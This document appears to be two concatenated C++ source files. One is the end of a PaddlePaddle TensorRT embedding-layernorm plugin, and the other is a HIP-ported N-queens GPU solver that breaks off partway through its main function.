static_cast<int32_t const*>(inputs[2]), 
static_cast<int32_t const*>(inputs[3]), nbLookupTables_, beta, gamma, static_cast<float const*>(mIdsEmbPtrs[0]), static_cast<float const*>(mIdsEmbPtrs[1]), static_cast<float const*>(mIdsEmbPtrs[2]), static_cast<float const*>(mIdsEmbPtrs[3]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], mIdsVocabSize[3], output); } else { PADDLE_THROW(platform::errors::InvalidArgument( "Only support 2,3,4 lookup_tables fused ")); } } else if (mType == nvinfer1::DataType::kHALF) { auto output = static_cast<half*>(outputs[0]); if (nbLookupTables_ == 2) { return embSkipLayerNormHFace_2<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), mIdsVocabSize[0], mIdsVocabSize[1], output); } else if (nbLookupTables_ == 3) { return embSkipLayerNormHFace_3<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), static_cast<half const*>(mIdsEmbPtrs[2]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], output); } else if (nbLookupTables_ == 4) { return embSkipLayerNormHFace_4<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), static_cast<int32_t const*>(inputs[3]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), static_cast<half const*>(mIdsEmbPtrs[2]), static_cast<half const*>(mIdsEmbPtrs[3]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], mIdsVocabSize[3], output); } else { PADDLE_THROW(platform::errors::InvalidArgument( "Only support 2,3,4 lookup_tables fused ")); } } else { PADDLE_THROW(platform::errors::InvalidArgument( "Unsupported type error, expected [kHALF,kFLOAT]")); } return STATUS_SUCCESS; } int32_t EmbLayerNormVarSeqlenPluginMTron::enqueue( nvinfer1::PluginTensorDesc const* inputDesc, nvinfer1::PluginTensorDesc const* outputDesc, void const* const* inputs, void* const* outputs, void* workspace, cudaStream_t stream) noexcept { int32_t batchSize = inputDesc[0].dims.d[0] - 1; // read out the maximum sequence length from the dummy input int32_t const maxSeqlen = inputDesc[nbLookupTables_].dims.d[0]; int32_t S = 384; if (maxSeqlen <= 128) { S = 128; } else if (maxSeqlen <= 192) { S = 192; } else if (maxSeqlen <= 256) { S = 256; } const float* beta = mBetaDev.get(); const float* gamma = mGammaDev.get(); if (mType == nvinfer1::DataType::kFLOAT) { auto output = static_cast<float*>(outputs[0]); auto skip = static_cast<float*>(outputs[1]); if (nbLookupTables_ == 2) { return embSkipLayerNormMTron_2<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), nbLookupTables_, beta, gamma, static_cast<float const*>(mIdsEmbPtrs[0]), static_cast<float const*>(mIdsEmbPtrs[1]), mIdsVocabSize[0], mIdsVocabSize[1], output, skip); } else if (nbLookupTables_ == 3) { return embSkipLayerNormMTron_3<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), nbLookupTables_, beta, gamma, static_cast<float 
const*>(mIdsEmbPtrs[0]), static_cast<float const*>(mIdsEmbPtrs[1]), static_cast<float const*>(mIdsEmbPtrs[2]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], output, skip); } else if (nbLookupTables_ == 4) { return embSkipLayerNormMTron_4<float>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), static_cast<int32_t const*>(inputs[3]), nbLookupTables_, beta, gamma, static_cast<float const*>(mIdsEmbPtrs[0]), static_cast<float const*>(mIdsEmbPtrs[1]), static_cast<float const*>(mIdsEmbPtrs[2]), static_cast<float const*>(mIdsEmbPtrs[3]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], mIdsVocabSize[3], output, skip); } else { PADDLE_THROW(platform::errors::InvalidArgument( "Only support 2,3,4 lookup_tables fused ")); } } else if (mType == nvinfer1::DataType::kHALF) { auto output = static_cast<half*>(outputs[0]); auto skip = static_cast<half*>(outputs[1]); if (nbLookupTables_ == 2) { return embSkipLayerNormMTron_2<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), mIdsVocabSize[0], mIdsVocabSize[1], output, skip); } else if (nbLookupTables_ == 3) { return embSkipLayerNormMTron_3<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), static_cast<half const*>(mIdsEmbPtrs[2]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], output, skip); } else if (nbLookupTables_ == 4) { return embSkipLayerNormMTron_4<half>( stream, static_cast<int32_t>(mLd), batchSize, S, static_cast<int32_t const*>(inputs[0]), static_cast<int32_t const*>(inputs[1]), static_cast<int32_t const*>(inputs[2]), static_cast<int32_t const*>(inputs[3]), nbLookupTables_, beta, gamma, static_cast<half const*>(mIdsEmbPtrs[0]), static_cast<half const*>(mIdsEmbPtrs[1]), static_cast<half const*>(mIdsEmbPtrs[2]), static_cast<half const*>(mIdsEmbPtrs[3]), mIdsVocabSize[0], mIdsVocabSize[1], mIdsVocabSize[2], mIdsVocabSize[3], output, skip); } else { PADDLE_THROW(platform::errors::InvalidArgument( "Only support 2,3,4 lookup_tables fused ")); } } else { PADDLE_THROW(platform::errors::InvalidArgument( "Unsupported type error, expected [kHALF,kFLOAT]")); } return STATUS_SUCCESS; } // IPluginV2Ext Methods nvinfer1::DataType EmbLayerNormVarSeqlenPluginBase::getOutputDataType( int32_t index, nvinfer1::DataType const* inputTypes, int32_t nbInputs) const noexcept { assert(index == 0 || index == 1); if (index == 0) { assert(mType == nvinfer1::DataType::kHALF || mType == nvinfer1::DataType::kFLOAT); return mType; } return nvinfer1::DataType::kHALF; } // IPluginV2 Methods char const* EmbLayerNormVarSeqlenPluginBase::getPluginType() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_NAME; } char const* EmbLayerNormVarSeqlenPluginHFace::getPluginVersion() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_VERSION_HFACE; } char const* EmbLayerNormVarSeqlenPluginMTron::getPluginVersion() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_VERSION_MTRON; } int32_t EmbLayerNormVarSeqlenPluginBase::getNbOutputs() const noexcept { return 3; } int32_t EmbLayerNormVarSeqlenPluginHFace::initialize() noexcept { 
TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace initialize"); return 0; } int32_t EmbLayerNormVarSeqlenPluginMTron::initialize() noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron initialize"); return 0; } void EmbLayerNormVarSeqlenPluginHFace::terminate() noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace terminate"); } void EmbLayerNormVarSeqlenPluginMTron::terminate() noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron terminate"); } size_t EmbLayerNormVarSeqlenPluginBase::getSerializationSize() const noexcept { size_t const wordSize = getElementSize(mType); return 2 * sizeof(float) * mLd // beta + gamma + sizeof(mType) // + sizeof(mLd) // + mIdsVocabSize.size() * sizeof(mIdsVocabSize[0]) // + wordSize * mLd * accumulate( mIdsVocabSize.begin(), mIdsVocabSize.end(), 0) // ids emb + sizeof(nbLookupTables_); // numbers of lookup_table } void EmbLayerNormVarSeqlenPluginBase::serialize(void* buffer) const noexcept { serialize_value(&buffer, mType); serialize_value(&buffer, mLd); serialize_value(&buffer, nbLookupTables_); for (size_t i = 0; i < mIdsVocabSize.size(); ++i) { serialize_value(&buffer, mIdsVocabSize[i]); } char* d = static_cast<char*>(buffer); size_t const wordSize = getElementSize(mType); serFromDev(&d, mBetaDev.get(), mLd); serFromDev(&d, mGammaDev.get(), mLd); for (size_t i = 0; i < mIdsEmbPtrs.size(); ++i) { serFromDev(&d, static_cast<char*>(mIdsEmbPtrs[i]), mLd * mIdsVocabSize[i] * wordSize); } } void EmbLayerNormVarSeqlenPluginBase::destroy() noexcept { // This gets called when the network containing plugin is destroyed mBetaDev.reset(nullptr); mGammaDev.reset(nullptr); for (size_t i = 0; i < mIdsEmbPtrs.size(); ++i) { cudaFree(mIdsEmbPtrs[i]); } delete this; } void EmbLayerNormVarSeqlenPluginHFace::destroy() noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace destroy"); EmbLayerNormVarSeqlenPluginBase::destroy(); } void EmbLayerNormVarSeqlenPluginMTron::destroy() noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron destroy"); EmbLayerNormVarSeqlenPluginBase::destroy(); } void EmbLayerNormVarSeqlenPluginBase::setPluginNamespace( char const* libNamespace) noexcept { mNamespace = libNamespace; } char const* EmbLayerNormVarSeqlenPluginBase::getPluginNamespace() const noexcept { return mNamespace.c_str(); } EmbLayerNormVarSeqlenPluginBaseCreator:: EmbLayerNormVarSeqlenPluginBaseCreator() {} char const* EmbLayerNormVarSeqlenPluginBaseCreator::getPluginName() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_NAME; } char const* EmbLayerNormVarSeqlenPluginHFaceCreator::getPluginVersion() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_VERSION_HFACE; } char const* EmbLayerNormVarSeqlenPluginMTronCreator::getPluginVersion() const noexcept { return EMB_LAYER_NORM_VAR_SEQLEN_VERSION_MTRON; } nvinfer1::PluginFieldCollection const* EmbLayerNormVarSeqlenPluginBaseCreator::getFieldNames() noexcept { return &mFC; } bool initializeFields(nvinfer1::PluginFieldCollection const* fc, nvinfer1::Weights* beta, nvinfer1::Weights* gamma, std::vector<nvinfer1::Weights>* IdsEmb) { bool output_fp16 = false; for (int32_t i = 0; i < fc->nbFields; i++) { std::string field_name(fc->fields[i].name); if (field_name.compare("bert_embeddings_layernorm_beta") == 0) { TRANSFORMER_DEBUG_MSG("Building bert_embeddings_layernorm_beta..."); beta->values = fc->fields[i].data; beta->count = fc->fields[i].length; beta->type = fieldTypeToDataType(fc->fields[i].type); } if (field_name.compare("bert_embeddings_layernorm_gamma") == 0) { 
TRANSFORMER_DEBUG_MSG("Building bert_embeddings_layernorm_gamma..."); gamma->values = fc->fields[i].data; gamma->count = fc->fields[i].length; gamma->type = fieldTypeToDataType(fc->fields[i].type); } if (field_name.compare("output_fp16") == 0) { TRANSFORMER_DEBUG_MSG("Building output_fp16..."); assert(fc->fields[i].type == nvinfer1::PluginFieldType::kINT32); output_fp16 = static_cast<int32_t const*>(fc->fields[i].data)[0] != 0; } if (field_name.compare("bert_embeddings_word_embeddings_" + std::to_string(i - 3)) == 0) { TRANSFORMER_DEBUG_MSG( ("bert_embeddings_word_embeddings_" + std::to_string(i - 3)).c_str()); nvinfer1::Weights tem; tem.values = fc->fields[i].data; tem.count = fc->fields[i].length; tem.type = fieldTypeToDataType(fc->fields[i].type); IdsEmb->push_back(tem); } } return output_fp16; } nvinfer1::IPluginV2* EmbLayerNormVarSeqlenPluginHFaceCreator::createPlugin( char const* name, nvinfer1::PluginFieldCollection const* fc) noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenHFace createPlugin"); nvinfer1::Weights beta; nvinfer1::Weights gamma; std::vector<nvinfer1::Weights> IdsEmb; bool output_fp16 = initializeFields(fc, &beta, &gamma, &IdsEmb); TRANSFORMER_DEBUG_MSG("Building the Plugin..."); EmbLayerNormVarSeqlenPluginHFace* p = new EmbLayerNormVarSeqlenPluginHFace( name, output_fp16 ? nvinfer1::DataType::kHALF : nvinfer1::DataType::kFLOAT, beta, gamma, IdsEmb); return p; } nvinfer1::IPluginV2* EmbLayerNormVarSeqlenPluginMTronCreator::createPlugin( char const* name, nvinfer1::PluginFieldCollection const* fc) noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenMTron createPlugin"); nvinfer1::Weights beta; nvinfer1::Weights gamma; std::vector<nvinfer1::Weights> IdsEmb; bool output_fp16 = initializeFields(fc, &beta, &gamma, &IdsEmb); TRANSFORMER_DEBUG_MSG("Building the Plugin..."); EmbLayerNormVarSeqlenPluginMTron* p = new EmbLayerNormVarSeqlenPluginMTron( name, output_fp16 ? nvinfer1::DataType::kHALF : nvinfer1::DataType::kFLOAT, beta, gamma, IdsEmb); return p; } nvinfer1::IPluginV2* EmbLayerNormVarSeqlenPluginHFaceCreator::deserializePlugin( char const* name, void const* serialData, size_t serialLength) noexcept { return new EmbLayerNormVarSeqlenPluginHFace(name, serialData, serialLength); } nvinfer1::IPluginV2* EmbLayerNormVarSeqlenPluginMTronCreator::deserializePlugin( char const* name, void const* serialData, size_t serialLength) noexcept { return new EmbLayerNormVarSeqlenPluginMTron(name, serialData, serialLength); } void EmbLayerNormVarSeqlenPluginBaseCreator::setPluginNamespace( char const* libNamespace) noexcept { mNamespace = libNamespace; } char const* EmbLayerNormVarSeqlenPluginBaseCreator::getPluginNamespace() const noexcept { return mNamespace.c_str(); } } // namespace plugin } // namespace tensorrt } // namespace inference } // namespace paddle
122f8e2edebd52308521259b8f2f8588ac61c46e.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" // N-queen for CUDA // // Copyright(c) 2008 Ping-Che Chen //#define WIN32_LEAN_AND_MEAN //#include <windows.h> #include <stdio.h> #include <cutil.h> #define THREAD_NUM 96 int bunk = 0; // this is a dummy variable used for making sure clock() are not optimized out /* * ---------------------------------------------------------------- * This is a recursive version of n-queen backtracking solver. * A non-recursive version is used instead. * ---------------------------------------------------------------- long long solve_nqueen_internal(int n, unsigned int mask, unsigned int l_mask, unsigned int r_mask, unsigned int t_mask) { if(mask == t_mask) { return 1; } unsigned int m = (mask | l_mask | r_mask); if((m & t_mask) == t_mask) { return 0; } long long total = 0; unsigned int index = (m + 1) & ~m; while((index & t_mask) != 0) { total += solve_nqueen_internal(mask | index, (l_mask | index) << 1, (r_mask | index) >> 1, t_mask); m |= index; index = (m + 1) & ~m; } return total; } long long solve_nqueen(int n) { return solve_nqueen_internal(0, 0, 0, (1 << n) - 1); } */ /* ------------------------------------------------------------------- * This is a non-recursive version of n-queen backtracking solver. * This provides the basis for the CUDA version. * ------------------------------------------------------------------- */ long long solve_nqueen(int n) { unsigned int mask[32]; unsigned int l_mask[32]; unsigned int r_mask[32]; unsigned int m[32]; if(n <= 0 || n > 32) { return 0; } const unsigned int t_mask = (1 << n) - 1; long long total = 0; long long upper_total = 0; int i = 0, j; unsigned int index; mask[0] = 0; l_mask[0] = 0; r_mask[0] = 0; m[0] = 0; for(j = 0; j < (n + 1) / 2; j++) { index = (1 << j); m[0] |= index; mask[1] = index; l_mask[1] = index << 1; r_mask[1] = index >> 1; m[1] = (mask[1] | l_mask[1] | r_mask[1]); i = 1; if(n % 2 == 1 && j == (n + 1) / 2 - 1) { upper_total = total; total = 0; } while(i > 0) { if((m[i] & t_mask) == t_mask) { i--; } else { index = ((m[i] + 1) ^ m[i]) & ~m[i]; m[i] |= index; if((index & t_mask) != 0) { if(i + 1 == n) { total++; i--; } else { mask[i + 1] = mask[i] | index; l_mask[i + 1] = (l_mask[i] | index) << 1; r_mask[i + 1] = (r_mask[i] | index) >> 1; m[i + 1] = (mask[i + 1] | l_mask[i + 1] | r_mask[i + 1]); i++; } } else { i --; } } } } bunk = 2; if(n % 2 == 0) { return total * 2; } else { return upper_total * 2 + total; } } /* ------------------------------------------------------------------- * This is a non-recursive version of n-queen backtracking solver * with multi-thread support. 
* ------------------------------------------------------------------- */ /* struct thread_context { HANDLE thread; bool stop; long long total; int n; unsigned int mask; unsigned int l_mask; unsigned int r_mask; unsigned int t_mask; HANDLE ready; HANDLE complete; }; DWORD WINAPI solve_nqueen_proc(LPVOID param) { thread_context* ctx = (thread_context*) param; unsigned int mask[32]; unsigned int l_mask[32]; unsigned int r_mask[32]; unsigned int m[32]; unsigned int t_mask; long long total; unsigned int index; unsigned int mark; for(;;) { WaitForSingleObject(ctx->ready, INFINITE); if(ctx->stop) { break; } int i = 0; mask[0] = ctx->mask; l_mask[0] = ctx->l_mask; r_mask[0] = ctx->r_mask; m[0] = mask[0] | l_mask[0] | r_mask[0]; total = 0; t_mask = ctx->t_mask; mark = ctx->n; while(i >= 0) { if((m[i] & t_mask) == t_mask) { i--; } else { index = (m[i] + 1) & ~m[i]; m[i] |= index; if((index & t_mask) != 0) { if(i + 1 == mark) { total++; i--; } else { mask[i + 1] = mask[i] | index; l_mask[i + 1] = (l_mask[i] | index) << 1; r_mask[i + 1] = (r_mask[i] | index) >> 1; m[i + 1] = (mask[i + 1] | l_mask[i + 1] | r_mask[i + 1]); i++; } } else { i --; } } } ctx->total = total; SetEvent(ctx->complete); } return 0; } long long solve_nqueen_mcpu(int n) { if(n <= 0 || n > 32) { return 0; } SYSTEM_INFO info; thread_context* threads; int num_threads; GetSystemInfo(&info); num_threads = info.dwNumberOfProcessors; if(num_threads == 1) { // only one cpu found, use single thread version return solve_nqueen(n); } threads = new thread_context[num_threads]; int j; for(j = 0; j < num_threads; j++) { threads[j].stop = false; threads[j].ready = CreateEvent(0, FALSE, FALSE, 0); threads[j].complete = CreateEvent(0, FALSE, TRUE, 0); threads[j].thread = CreateThread(0, 0, solve_nqueen_proc, threads + j, 0, 0); threads[j].total = 0; } int thread_idx = 0; const unsigned int t_mask = (1 << n) - 1; long long total = 0; unsigned int index; unsigned int m_mask = 0; if(n % 2 == 1) { m_mask = 1 << ((n + 1) / 2 - 1); } for(j = 0; j < (n + 1) / 2; j++) { index = 1 << j; WaitForSingleObject(threads[thread_idx].complete, INFINITE); if(threads[thread_idx].mask != m_mask) { total += threads[thread_idx].total * 2; } else { total += threads[thread_idx].total; } threads[thread_idx].mask = index; threads[thread_idx].l_mask = index << 1; threads[thread_idx].r_mask = index >> 1; threads[thread_idx].t_mask = t_mask; threads[thread_idx].total = 0; threads[thread_idx].n = n - 1; SetEvent(threads[thread_idx].ready); thread_idx = (thread_idx + 1) % num_threads; } // collect all threads... HANDLE* events = new HANDLE[num_threads]; for(j = 0; j < num_threads; j++) { events[j] = threads[j].complete; } WaitForMultipleObjects(num_threads, events, TRUE, INFINITE); for(j = 0; j < num_threads; j++) { if(threads[j].mask != m_mask) { total += threads[j].total * 2; } else { total += threads[j].total; } threads[j].stop = true; SetEvent(threads[j].ready); events[j] = threads[j].thread; } WaitForMultipleObjects(num_threads, events, TRUE, INFINITE); for(j = 0; j < num_threads; j++) { CloseHandle(threads[j].thread); CloseHandle(threads[j].ready); CloseHandle(threads[j].complete); } delete[] threads; delete[] events; bunk = 3; return total; } */ /* -------------------------------------------------------------------------- * This is a non-recursive version of n-queen backtracking solver for CUDA. * It receives multiple initial conditions from a CPU iterator, and count * each conditions. 
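 * Bit conventions used throughout: `mask` marks occupied columns, `l_mask` and
 * `r_mask` mark squares attacked along the left/right diagonals (shifted by one
 * each row), and the lowest free column is picked with index = (m + 1) & ~m.
 * For n > 11 the host enumerates placements for the first n - 10 rows and the
 * kernel finishes the remaining 10 rows for each initial condition, summing the
 * per-thread counts with the shared-memory reduction at the end of the kernel.
 * Only the left half of the columns in row 0 is enumerated and the total is
 * doubled; the middle column of an odd-sized board is handled separately.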
* -------------------------------------------------------------------------- */ __global__ void solve_nqueen_cuda_kernel(int n, int mark, unsigned int* total_masks, unsigned int* total_l_masks, unsigned int* total_r_masks, unsigned int* results, int total_conditions) { const int tid = threadIdx.x; const int bid = blockIdx.x; const int idx = bid * blockDim.x + tid; __shared__ unsigned int mask[THREAD_NUM][10]; __shared__ unsigned int l_mask[THREAD_NUM][10]; __shared__ unsigned int r_mask[THREAD_NUM][10]; __shared__ unsigned int m[THREAD_NUM][10]; __shared__ unsigned int sum[THREAD_NUM]; const unsigned int t_mask = (1 << n) - 1; int total = 0; int i = 0; unsigned int index; if(idx < total_conditions) { mask[tid][i] = total_masks[idx]; l_mask[tid][i] = total_l_masks[idx]; r_mask[tid][i] = total_r_masks[idx]; m[tid][i] = mask[tid][i] | l_mask[tid][i] | r_mask[tid][i]; while(i >= 0) { if((m[tid][i] & t_mask) == t_mask) { i--; } else { index = (m[tid][i] + 1) & ~m[tid][i]; m[tid][i] |= index; if((index & t_mask) != 0) { if(i + 1 == mark) { total++; i--; } else { mask[tid][i + 1] = mask[tid][i] | index; l_mask[tid][i + 1] = (l_mask[tid][i] | index) << 1; r_mask[tid][i + 1] = (r_mask[tid][i] | index) >> 1; m[tid][i + 1] = (mask[tid][i + 1] | l_mask[tid][i + 1] | r_mask[tid][i + 1]); i++; } } else { i --; } } } sum[tid] = total; } else { sum[tid] = 0; } __syncthreads(); // reduction if(tid < 64 && tid + 64 < THREAD_NUM) { sum[tid] += sum[tid + 64]; } __syncthreads(); if(tid < 32) { sum[tid] += sum[tid + 32]; } __syncthreads(); if(tid < 16) { sum[tid] += sum[tid + 16]; } __syncthreads(); if(tid < 8) { sum[tid] += sum[tid + 8]; } __syncthreads(); if(tid < 4) { sum[tid] += sum[tid + 4]; } __syncthreads(); if(tid < 2) { sum[tid] += sum[tid + 2]; } __syncthreads(); if(tid < 1) { sum[tid] += sum[tid + 1]; } __syncthreads(); if(tid == 0) { results[bid] = sum[0]; } } long long solve_nqueen_cuda(int n, int steps) { // generating start conditions unsigned int mask[32]; unsigned int l_mask[32]; unsigned int r_mask[32]; unsigned int m[32]; unsigned int index; if(n <= 0 || n > 32) { return 0; } unsigned int* total_masks = new unsigned int[steps]; unsigned int* total_l_masks = new unsigned int[steps]; unsigned int* total_r_masks = new unsigned int[steps]; unsigned int* results = new unsigned int[steps]; unsigned int* masks_cuda; unsigned int* l_masks_cuda; unsigned int* r_masks_cuda; unsigned int* results_cuda; hipMalloc((void**) &masks_cuda, sizeof(int) * steps); hipMalloc((void**) &l_masks_cuda, sizeof(int) * steps); hipMalloc((void**) &r_masks_cuda, sizeof(int) * steps); hipMalloc((void**) &results_cuda, sizeof(int) * steps / THREAD_NUM); const unsigned int t_mask = (1 << n) - 1; const unsigned int mark = n > 11 ? 
n - 10 : 2; long long total = 0; int total_conditions = 0; int i = 0, j; mask[0] = 0; l_mask[0] = 0; r_mask[0] = 0; m[0] = 0; bool computed = false; for(j = 0; j < n / 2; j++) { index = (1 << j); m[0] |= index; mask[1] = index; l_mask[1] = index << 1; r_mask[1] = index >> 1; m[1] = (mask[1] | l_mask[1] | r_mask[1]); i = 1; while(i > 0) { if((m[i] & t_mask) == t_mask) { i--; } else { index = (m[i] + 1) & ~m[i]; m[i] |= index; if((index & t_mask) != 0) { mask[i + 1] = mask[i] | index; l_mask[i + 1] = (l_mask[i] | index) << 1; r_mask[i + 1] = (r_mask[i] | index) >> 1; m[i + 1] = (mask[i + 1] | l_mask[i + 1] | r_mask[i + 1]); i++; if(i == mark) { total_masks[total_conditions] = mask[i]; total_l_masks[total_conditions] = l_mask[i]; total_r_masks[total_conditions] = r_mask[i]; total_conditions++; if(total_conditions == steps) { if(computed) { hipMemcpy(results, results_cuda, sizeof(int) * steps / THREAD_NUM, hipMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } computed = false; } // start computation hipMemcpy(masks_cuda, total_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); hipMemcpy(l_masks_cuda, total_l_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); hipMemcpy(r_masks_cuda, total_r_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); hipLaunchKernelGGL(( solve_nqueen_cuda_kernel), dim3(steps/THREAD_NUM), dim3(THREAD_NUM), 0, 0, n, n - mark, masks_cuda, l_masks_cuda, r_masks_cuda, results_cuda, total_conditions); computed = true; total_conditions = 0; } i--; } } else { i --; } } } } if(computed) { hipMemcpy(results, results_cuda, sizeof(int) * steps / THREAD_NUM, hipMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } computed = false; } hipMemcpy(masks_cuda, total_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); hipMemcpy(l_masks_cuda, total_l_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); hipMemcpy(r_masks_cuda, total_r_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); hipLaunchKernelGGL(( solve_nqueen_cuda_kernel), dim3(steps/THREAD_NUM), dim3(THREAD_NUM), 0, 0, n, n - mark, masks_cuda, l_masks_cuda, r_masks_cuda, results_cuda, total_conditions); hipMemcpy(results, results_cuda, sizeof(int) * steps / THREAD_NUM, hipMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } total *= 2; if(n % 2 == 1) { computed = false; total_conditions = 0; index = (1 << (n - 1) / 2); m[0] |= index; mask[1] = index; l_mask[1] = index << 1; r_mask[1] = index >> 1; m[1] = (mask[1] | l_mask[1] | r_mask[1]); i = 1; while(i > 0) { if((m[i] & t_mask) == t_mask) { i--; } else { index = (m[i] + 1) & ~m[i]; m[i] |= index; if((index & t_mask) != 0) { mask[i + 1] = mask[i] | index; l_mask[i + 1] = (l_mask[i] | index) << 1; r_mask[i + 1] = (r_mask[i] | index) >> 1; m[i + 1] = (mask[i + 1] | l_mask[i + 1] | r_mask[i + 1]); i++; if(i == mark) { total_masks[total_conditions] = mask[i]; total_l_masks[total_conditions] = l_mask[i]; total_r_masks[total_conditions] = r_mask[i]; total_conditions++; if(total_conditions == steps) { if(computed) { hipMemcpy(results, results_cuda, sizeof(int) * steps / THREAD_NUM, hipMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } computed = false; } // start computation hipMemcpy(masks_cuda, total_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); hipMemcpy(l_masks_cuda, total_l_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); 
hipMemcpy(r_masks_cuda, total_r_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); hipLaunchKernelGGL(( solve_nqueen_cuda_kernel), dim3(steps/THREAD_NUM), dim3(THREAD_NUM), 0, 0, n, n - mark, masks_cuda, l_masks_cuda, r_masks_cuda, results_cuda, total_conditions); computed = true; total_conditions = 0; } i--; } } else { i --; } } } if(computed) { hipMemcpy(results, results_cuda, sizeof(int) * steps / THREAD_NUM, hipMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } computed = false; } hipMemcpy(masks_cuda, total_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); hipMemcpy(l_masks_cuda, total_l_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); hipMemcpy(r_masks_cuda, total_r_masks, sizeof(int) * total_conditions, hipMemcpyHostToDevice); hipLaunchKernelGGL(( solve_nqueen_cuda_kernel), dim3(steps/THREAD_NUM), dim3(THREAD_NUM), 0, 0, n, n - mark, masks_cuda, l_masks_cuda, r_masks_cuda, results_cuda, total_conditions); hipMemcpy(results, results_cuda, sizeof(int) * steps / THREAD_NUM, hipMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } } hipFree(masks_cuda); hipFree(l_masks_cuda); hipFree(r_masks_cuda); hipFree(results_cuda); delete[] total_masks; delete[] total_l_masks; delete[] total_r_masks; delete[] results; bunk = 1; return total; } bool InitCUDA() { int count; hipGetDeviceCount(&count); if(count == 0) { fprintf(stderr, "There is no device.\n"); return false; } int i; for(i = 0; i < count; i++) { hipDeviceProp_t prop; if(hipGetDeviceProperties(&prop, i) == hipSuccess) { if(prop.major >= 1) { break; } } } if(i == count) { fprintf(stderr, "There is no device supporting CUDA 1.x.\n"); return false; } hipSetDevice(i); return true; } int main(int argc, char** argv) { unsigned int hTimer; double gpuTime; // initialise card and timer int deviceCount; CUDA_SAFE_CALL_NO_SYNC(hipGetDeviceCount(&deviceCount)); if (deviceCount == 0) { fprintf(stderr, "There is no device.\n"); exit(EXIT_FAILURE); } int dev; for (dev = 0; dev < deviceCount; ++dev) { hipDeviceProp_t deviceProp; CUDA_SAFE_CALL_NO_SYNC(hipGetDeviceProperties(&deviceProp, dev)); if (deviceProp.major >= 1) break; } if (dev == deviceCount) { fprintf(stderr, "There is no device supporting CUDA.\n"); exit(EXIT_FAILURE); } else CUDA_SAFE_CALL(hipSetDevice(dev)); CUT_SAFE_CALL( cutCreateTimer(&hTimer) ); int n = 12; clock_t start, end; long long solution; bool cpu = true, gpu = true; int argstart = 1, steps = 24576; if(argc >= 2 && argv[1][0] == '-') { if(argv[1][1] == 'c' || argv[1][1] == 'C') { gpu = false; } else if(argv[1][1] == 'g' || argv[1][1] == 'G') { cpu = false; } argstart = 2; } if(argc < argstart + 1) { 